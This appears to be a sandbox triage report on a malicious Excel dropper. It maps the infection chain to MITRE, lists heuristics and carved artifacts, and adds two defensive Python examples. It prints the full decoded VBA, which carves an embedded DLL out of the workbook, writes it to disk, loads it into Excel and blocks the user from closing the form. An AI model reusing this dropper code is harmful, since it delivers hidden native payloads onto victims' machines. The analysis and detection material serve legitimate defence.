Verdict: MALICIOUS (risk score 500)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1105 Ingress Tool Transfer
- T1204.002 Malicious File
- T1027 Obfuscated Files or Information
This Excel document carries VBA macros that stage and load a native DLL shipped inside the workbook itself. The recovered macro source contains no download, so the payload arrives with the file (T1204.002); the T1105 entry in the mapping can only apply to what the DLL does after it is loaded, which a static view cannot confirm. The chain visible in macros.bas is: ThisWorkbook (module Sem) Workbook_Activate calls Module1.Workbook_Activate, which creates a WScript.Shell object solely to resolve two directory names stored in the Tag properties of UserForm2 controls (one through ExpandEnvironmentStrings, one through SpecialFolders; the values themselves live in the form and are not in the decoded source), changes directory there and shows UserForm1. UserForm1 strips its own system menu through user32 SetWindowLong so the user cannot close it, and its UserForm_Activate event runs Module3.ReplaceCurrentModule. That routine copies the sheets into a fresh workbook, saves it as OOXML (FileFormat 51, .xlsx), renames the copy to .zip, and uses Shell.Application to pull xl\embeddings\oleObject1.bin out of the archive. NewValuje then streams through that object looking for the three bytes 77, 90, 144 ("MZ" followed by 0x90, assembled at run time as 50+27, 50+40, 50+94), takes the first match on 32-bit Office or the second on 64-bit, and writes 266,240 or 186,368 bytes to module_p1.dll or module_p2.dll in the SpecialFolders directory. LoadLibraryW (declared under the alias RbdSAslla2) maps the DLL and VBA then calls its export RbdSAslla directly, so the payload executes inside EXCEL.EXE without a child process. Those two lengths sum to 452,608 bytes, which fits inside the 465,961-byte Ole10Native stream listed under extracted artifacts, so the OLE_EMBEDDED_EXE hit is consistent with that embedded package; the 747,130-byte file carved at offset 0x3186 is larger than either declared image and presumably includes trailing container data. The identifier renaming is mechanical (Resize survives as ReAPI_LENGTH in Sub test(), the residue of a find-and-replace of "size" with "API_LENGTH"), which is the obfuscation behind the T1027 mapping. Two heuristics need context: the ExecuteExcel4Macro calls in Module1 only invoke the XLM MESSAGE() function against the status bar, and the line matched by OLE_VBA_ACTIVEX_XLM_STAGER is in Sub test(), a Counta() helper that nothing in the decoded source calls, so that heuristic corroborates rather than describes the execution path. LoadLibraryW and WScript.Shell do appear in the VBA, but the GetProcAddress, VirtualAlloc and VirtualProtect string references do not, and most likely come from the carved PE, which is the artifact to analyse next.
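Hunting for this chain on an endpoint, as an added example that is not part of the analyzer's output: the macro never spawns a child process, so the observable is an Office process writing a .dll into a user-writable directory and then mapping that same file into itself. The rule below runs over constructed Sysmon-style records (EventID 11 FileCreate, EventID 7 ImageLoad). Field names follow Sysmon, the drop path is an assumption (the real one comes from UserForm2.TextBox2.Tag, which is not in the decoded source), and none of the events come from the sandbox run.

```python
OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe"}
# Assumption: anything outside these roots is writable by an unprivileged user.
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def is_office_process(image: str) -> bool:
    return image.lower().rsplit("\\", 1)[-1] in OFFICE_IMAGES


def is_user_writable(path: str) -> bool:
    return not path.lower().startswith(TRUSTED_PREFIXES)


def detect_office_self_sideload(events):
    """Correlate Sysmon EventID 11 (FileCreate) with EventID 7 (ImageLoad) for Office processes.

    Returns (severity, message) tuples. Events are assumed to arrive in chronological order."""
    dropped = {}      # lower-cased DLL path -> ProcessGuid of the Office process that wrote it
    alerts = []
    for ev in events:
        image = ev.get("Image", "")
        if not is_office_process(image):
            continue
        if ev["EventID"] == 11:
            target = ev["TargetFilename"]
            if target.lower().endswith(".dll") and is_user_writable(target):
                dropped[target.lower()] = ev["ProcessGuid"]
        elif ev["EventID"] == 7:
            loaded = ev["ImageLoaded"]
            if dropped.get(loaded.lower()) == ev["ProcessGuid"]:
                alerts.append(("high", f"{image} wrote {loaded} and then loaded it into its own process"))
            elif is_user_writable(loaded) and ev.get("Signed", "false").lower() != "true":
                alerts.append(("medium", f"{image} loaded an unsigned DLL from a user-writable path: {loaded}"))
    return alerts


EXCEL = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
EXCEL_GUID = "{a1b2c3d4-0001-0001-0001-000000000001}"
CHROME_GUID = "{a1b2c3d4-0002-0002-0002-000000000002}"
# Constructed sample events; paths are hypothetical.
SAMPLE_EVENTS = [
    {"EventID": 11, "Image": EXCEL, "ProcessGuid": EXCEL_GUID,
     "TargetFilename": r"C:\Users\alice\AppData\Local\Temp\templates.xlsx.zip"},
    {"EventID": 11, "Image": EXCEL, "ProcessGuid": EXCEL_GUID,
     "TargetFilename": r"C:\Users\alice\AppData\Local\Temp\oleObject1.bin"},
    {"EventID": 11, "Image": EXCEL, "ProcessGuid": EXCEL_GUID,
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Templates\module_p2.dll"},
    {"EventID": 7, "Image": EXCEL, "ProcessGuid": EXCEL_GUID,
     "ImageLoaded": r"C:\Windows\System32\oleaut32.dll", "Signed": "true"},
    {"EventID": 7, "Image": EXCEL, "ProcessGuid": EXCEL_GUID,
     "ImageLoaded": r"C:\Users\alice\AppData\Roaming\Microsoft\Templates\module_p2.dll", "Signed": "false"},
    {"EventID": 7, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "ProcessGuid": CHROME_GUID,
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\helper.dll", "Signed": "false"},
    {"EventID": 7, "Image": EXCEL, "ProcessGuid": EXCEL_GUID,
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\legacy_addin.dll", "Signed": "false"},
]

if __name__ == "__main__":
    for severity, message in detect_office_self_sideload(SAMPLE_EVENTS):
        print(severity.upper(), message)
```

The write-then-load correlation is what separates this sample from the ordinary noise of unsigned add-ins under a user profile, which is why the latter only rates medium; the templates.xlsx.zip and oleObject1.bin creations are useful pivots once the high alert fires but are too generic to alert on alone.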
Heuristics (12)

- ClamAV: Xls.Dropper.Sdrop-7331943-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Xls.Dropper.Sdrop-7331943-0
- Embedded PE executable [critical, OLE_EMBEDDED_EXE]: MZ/PE header found inside document, possible embedded executable
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- WScript.Shell usage [critical, OLE_VBA_WSCRIPT]: WScript.Shell usage. Matched lines in script (Module1.Workbook_Activate): Dim SpecialPath As String / Set D500 = CreateObject("WScript.Shell")
- VBA ActiveX event launches decoded Excel4 macro [critical, OLE_VBA_ACTIVEX_XLM_STAGER]: VBA code attached to an auto-firing ActiveX/UserForm control event (e.g. _Layout/_Change/_Painted) decodes a string with Replace/Split/Join/StrReverse/Chr and passes the recovered formula text to ExecuteExcel4Macro. This bridges VBA event activation into XLM formula execution to call Win32 APIs / drop payloads while evading AutoOpen and Shell keyword detection; a high-confidence macro stager, not a specific Office parser CVE. Matched lines in script (Sub test(), which nothing in the decoded source calls): Debug.Print Temp1 / CCount = Application.ExecuteExcel4Macro(Temp1) / Debug.Print CCount
- CreateObject call [high, OLE_VBA_CREATEOBJ]: CreateObject call. Matched lines in script: Dim SpecialPath As String / Set D500 = CreateObject("WScript.Shell")
- Reference to Windows Script Host [high, SC_STR_WSCRIPT]
- Reference to LoadLibrary API [high, SC_STR_LOADLIBRARY]
- Reference to GetProcAddress API [high, SC_STR_GETPROCADDRESS]
- Suspicious extracted artifact [high, EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Reference to VirtualAlloc API [medium, SC_STR_VIRTUALALLOC]
- Reference to VirtualProtect API [medium, SC_STR_VIRTUALPROTECT]
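The OLE_EMBEDDED_EXE heuristic listed above is a header walk, not a string match: an "MZ" at some offset is only interesting if the e_lfanew field at +0x3C lands on a "PE\0\0" signature. The following is an added example, not the analyzer's own code, that performs that walk over a raw byte blob and classifies each image by the COFF Machine field. The container it scans is constructed here so it runs offline, and the decoy "MZ" with no PE behind it shows why the extra check matters.

```python
import struct

DOS_MAGIC = b"MZ"
PE_SIGNATURE = b"PE\0\0"
MACHINE_NAMES = {0x014C: "x86", 0x8664: "x64", 0x01C0: "ARM", 0xAA64: "ARM64"}


def find_embedded_pe(data: bytes) -> list:
    """Return (offset, machine) for every 'MZ' whose e_lfanew (at +0x3C) lands on a PE signature.

    A bare 'MZ' match is not enough: the two bytes occur in ordinary text and in compressed
    streams, so only headers that survive the e_lfanew walk are reported."""
    hits = []
    pos = data.find(DOS_MAGIC)
    while pos != -1:
        if pos + 0x40 <= len(data):                                   # full IMAGE_DOS_HEADER present
            e_lfanew = struct.unpack_from("<I", data, pos + 0x3C)[0]
            pe_off = pos + e_lfanew
            if (e_lfanew >= 0x40 and pe_off + 6 <= len(data)
                    and data[pe_off:pe_off + 4] == PE_SIGNATURE):
                machine = struct.unpack_from("<H", data, pe_off + 4)[0]  # IMAGE_FILE_HEADER.Machine
                hits.append((pos, MACHINE_NAMES.get(machine, f"{machine:#06x}")))
        pos = data.find(DOS_MAGIC, pos + 1)
    return hits


def report(data: bytes) -> list:
    """Format hits the way the artifact table does ('Office MZ+PE at offset 0x3186')."""
    return [f"MZ+PE ({machine}) at offset {off:#x}" for off, machine in find_embedded_pe(data)]


def build_stub_pe(machine: int, e_lfanew: int = 0x80) -> bytes:
    """Constructed minimal DOS header + PE signature + COFF header (no sections); test input only."""
    dos = bytearray(e_lfanew)
    dos[0:2] = DOS_MAGIC
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable, NumberOfSymbols,
    # SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, 0, 0)
    return bytes(dos) + PE_SIGNATURE + coff


# Constructed container: filler, a decoy 'MZ' with no PE behind it, then an x86 and an x64 stub image
SAMPLE = (b"\x00" * 0x100 + b"MZ-not-a-pe" + b"\x00" * 0x50
          + build_stub_pe(0x014C) + b"\x11" * 0x40 + build_stub_pe(0x8664))

if __name__ == "__main__":
    for line in report(SAMPLE):
        print(line)
```

Run over the raw .xls (or any carved stream) this reproduces the offset-style finding. Note that the analyzer's 747,130-byte carve at 0x3186 is larger than either DLL length the macro declares (266,240 and 186,368), so for the cut trust the declared lengths, or the PE section table, rather than the distance to end of file.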
Extracted artifacts (3)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | Detection |
|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8010 bytes | 2fdbb7387ec95608b3db06dd9f891f58ce9933ddbe09ad22196d9addbdfb86f8 | |
| embedded_office_00003186.exe | embedded-pe | Office MZ+PE at offset 0x3186 | 747130 bytes | 0eb6ebb8cf869b8f212e05b5b41aa79c1d24c2e9d310b6b341438bc8fb16c4a9 | ClamAV: no threats found. Obfuscation or payload: likely. Static shellcode analysis recovered command string(s): WScript.Shell |
| ole10native_00.bin | ole-package | OLE Ole10Native stream: MBD006B9836/Ole10Native | 465961 bytes | dbcae8c5a528096d8a676fbc8ae8b8863392f22f389f436f5eaa3aaaacec374a | |

Preview of macros.bas (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "Sem"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Activate()
If UserForm1.Visible = False Then
Module1.Workbook_Activate
End If
End Sub
Attribute VB_Name = "Page1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
#If Win64 Then
Public Declare PtrSafe Function RbdSAslla Lib _
"module_p2.dll" () As Integer
Public Declare PtrSafe Function RbdSAslla2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
#Else
Public Declare Function RbdSAslla2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
Public Declare Function RbdSAslla Lib _
"module_p1.dll" () As Integer
#End If
Public Sub NewValuje(s As String, nm As String, fl As Long, d_6 As Integer)
Dim d_1 As Long, d_2 As Byte, d_3 As Byte, d_4 As Byte
Dim d_5() As Long
ReDim d_5(1 To fl)
d_5(1) = CByte(50 + 27)
d_5(2) = CByte(50 + 40)
d_5(3) = CByte(50 + 94)
d_1 = FreeFile
Open s For Binary Access Read As d_1
Dim cur As Integer
cur = 1
Do While Not EOF(d_1)
Get d_1, , d_2
If d_2 = d_5(1) Then
Get d_1, , d_3
If d_3 = d_5(2) Then
Get d_1, , d_4
If d_4 = d_5(3) Then
If cur = d_6 Then
For k = 4 To fl
Get d_1, , d_2
d_5(k) = d_2
Next k
Exit Do
Else
cur = cur + 1
End If
End If
End If
End If
Loop
Close d_1
d_1 = FreeFile
Open nm For Binary Lock Read Write As #d_1
For i = LBound(d_5) To UBound(d_5)
Put #d_1, , CByte(d_5(i))
Next i
Close #d_1
End Sub
Public Sub Workbook_Activate()
ExecuteExcel4Macro "MESSAGE(False, ""Debug"")"
Dim D500 As Object
Dim SpecialPath As String
Set D500 = CreateObject("WScript.Shell")
UserForm2.TextBox1.Tag = D500.ExpandEnvironmentStrings("%" + UserForm2.TextBox1.Tag + "%")
UserForm2.TextBox1.Tag = Replace(UserForm2.TextBox1.Tag, "%", "")
UserForm2.TextBox2.Tag = D500.SpecialFolders(UserForm2.TextBox2.Tag)
ChDir (UserForm2.TextBox1.Tag)
UserForm1.show
ExecuteExcel4Macro "MESSAGE(False, ""Debug"")"
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{9B3DABF1-341B-4E96-99C1-B7207A1AB871}{32B70631-FA61-4E0F-8568-AC4DDCD97227}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Label1_Click()
End Sub
Private Sub UserForm_Activate()
DoEvents
ReplaceCurrentModule
End Sub
Private Sub UserForm_Initialize()
Call SystemButtonSettings(Me, False)
End Sub
Attribute VB_Name = "Module2"
Private Const GWL_STYLE = -16
Private Const WS_CAPTION = &HC00000
Private Const WS_SYSMENU = &H80000
#If VBA7 Then
Private Declare PtrSafe Function GetWindowLong _
Lib "user32" Alias "GetWindowLongA" (ByVal hWnd As Long, _
ByVal nIndex As Long) As Long
Private Declare PtrSafe Function SetWindowLong _
Lib "user32" Alias "SetWindowLongA" (ByVal hWnd As Long, _
ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Private Declare PtrSafe Function FindWindowA _
Lib "user32" (ByVal lpClassName As String, _
ByVal lpWindowName As String) As Long
Private Declare PtrSafe Function DrawMenuBar _
Lib "user32" (ByVal hWnd As Long) As Long
#Else
Private Declare Function GetWindowLong _
Lib "user32" Alias "GetWindowLongA" ( _
ByVal hWnd As Long, ByVal nIndex As Long) As Long
Private Declare Function SetWindowLong _
Lib "user32" Alias "SetWindowLongA" ( _
ByVal hWnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Private Declare Function FindWindowA _
Lib "user32" (ByVal lpClassName As String, _
ByVal lpWindowName As String) As Long
Private Declare Function DrawMenuBar _
Lib "user32" (ByVal hWnd As Long) As Long
#End If
Public Sub KillArray(ParamArray PathList() As Variant)
On Error Resume Next
For Each Key In PathList
Kill Key
Next Key
On Error GoTo 0
End Sub
Public Sub SystemButtonSettings(frm As Object, show As Boolean)
Dim windowStyle As Long
Dim windowHandle As Long
windowHandle = FindWindowA(vbNullString, frm.Caption)
windowStyle = GetWindowLong(windowHandle, GWL_STYLE)
If show = False Then
SetWindowLong windowHandle, GWL_STYLE, (windowStyle And Not WS_SYSMENU)
Else
SetWindowLong windowHandle, GWL_STYLE, (windowStyle + WS_SYSMENU)
End If
DrawMenuBar (windowHandle)
End Sub
Attribute VB_Name = "Module3"
Public Sub ReplaceCurrentModule()
TempName = UserForm2.TextBox1.Tag & "\templates.xlsx"
ZipName = TempName + ".zip"
ZipFolder = UserForm2.TextBox1.Tag '& "\UnzTmp"
Dim nm As String
Dim API_LENGTH As Long
Dim d_6 As Integer
nm = UserForm2.TextBox2.Tag + "\module_p1"
API_LENGTH = 266240
d_6 = 1
#If Win64 Then
nm = UserForm2.TextBox2.Tag + "\module_p2"
API_LENGTH = 186368
d_6 = 2
#End If
nm = nm + ".d" + "ll"
KillArray ZipFolder & "\oleObj" + "ect*.bin", ZipName, nm
DoEvents
ThisWorkbook.Sheets.Copy
Application.DisplayAlerts = False
ActiveWorkbook.SaveAs TempName, FileFormat:=51
DoEvents
ActiveWorkbook.Close
DoEvents
FileCopy TempName, ZipName
Set oApp = CreateObject("Shell.Application")
oApp.Namespace(ZipFolder).CopyHere oApp.Namespace(ZipName).items.Item("xl\embeddings\oleObject1.bin")
NewValuje ZipFolder + "\oleObject1.bin", nm, API_LENGTH, d_6
ChDir (UserForm2.TextBox2.Tag)
No_RbdSAslla = RbdSAslla2(nm)
RbdSAslla
End Sub
Sub test()
Temp = "'" & ThisWorkbook.Path & "\[web.xlsm]Sheet1'!"
Temp1 = Temp & Rows(1).Address(, , xlR1C1)
Temp1 = "Counta(" & Temp1 & ")"
Debug.Print Temp1
CCount = Application.ExecuteExcel4Macro(Temp1)
Debug.Print CCount
Temp2 = Temp & Columns("A").Address(, , xlR1C1)
Temp2 = "Counta(" & Temp2 & ")"
RCount = Application.ExecuteExcel4Macro(Temp2)
ReDim arr(1 To RCount, 1 To CCount)
For R = 1 To RCount
For C = 1 To CCount
Temp3 = Temp & Cells(R, C).Address(, , xlR1C1)
arr(R, C) = Application.ExecuteExcel4Macro(Temp3)
Next
Next
Range("A1").ReAPI_LENGTH(RCount, CCount).Value = arr
End Sub
Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{60B2D69D-A27B-4B98-B9AA-38D5112CA728}{F641394C-4A27-46FC-926F-6EE29F9DC7B1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Page11"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
```